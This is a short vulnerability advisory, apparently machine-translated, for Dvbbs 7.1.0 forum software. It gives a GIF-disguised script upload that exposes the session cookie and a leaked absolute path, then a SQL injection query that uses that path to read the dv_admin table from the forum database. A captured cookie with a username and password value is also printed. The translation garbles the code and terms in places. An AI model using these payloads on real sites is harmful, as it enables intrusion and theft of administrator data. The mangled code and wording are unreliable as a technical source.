Dvbbs 7.1.0 cookie leakage absolute Path Vulnerability

Author: LiNZI [B .C. T] @ www.cnbct.org
Information Source: evil baboons Information Security Team

Vendor name: yunnet pioneer Discussion
Vendor address: http://www.dvbbs.net/
Vulnerability program: Dvbbs 7.1.0
Vulnerability description:
The Cookie of Dvbbs 7.1.0 has the absolute path vulnerability that exposes the site. Attackers can use other technologies to perform cross-Database SQL queries.
Vulnerability Exploitation example:
1. absolute vulnerability leakage test:
Official test site: bbs.dvbbs.net
Upload a graph with the following code:
GIF89a
<Script> alert (events. cookie) </script>
The cookie obtained by packet capture is as follows:
Cookie: ASPSESSIONIDSSDSCBQD = NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7 % 2E1% 2E0 = UserID = 617054 & usercookies = 1 & userclass = % D0 % C2 % CA % D6 % C9 % CF % C2 % B7 & username = linzibct & password = t8ob621664s5v6HL & userhidden = 2 & StatUserID = 2189992004; dvbbs =
Analyze the cookie to obtain the absolute path of the site as follows:
D: \ web \ dvbbs7 is the absolute path of the discussion.
Ii. Attack extension:
Www.host.com
The main program has the SQL injection vulnerability, but the table name and field name cannot be found.
Injection Point hypothesis:
Www.host.com \ linzi. asp? Fuck = you
The discussion is about dvbbs 7.1.0, the database is data \ dvbbs. asp, and anti-download processing is implemented.
Use the above Network violence path to capture packets and get the absolute path d: \ www \ dvbbs \ data \ dvbbs. asp
Cross-database query is implemented as follows:
Www.host.com \ linzi. asp? Fuck = you and (select count (*) from dv_admin in "d: \ www \ dvbbs \ data \ dvbbs. asp ")
Official patch:
No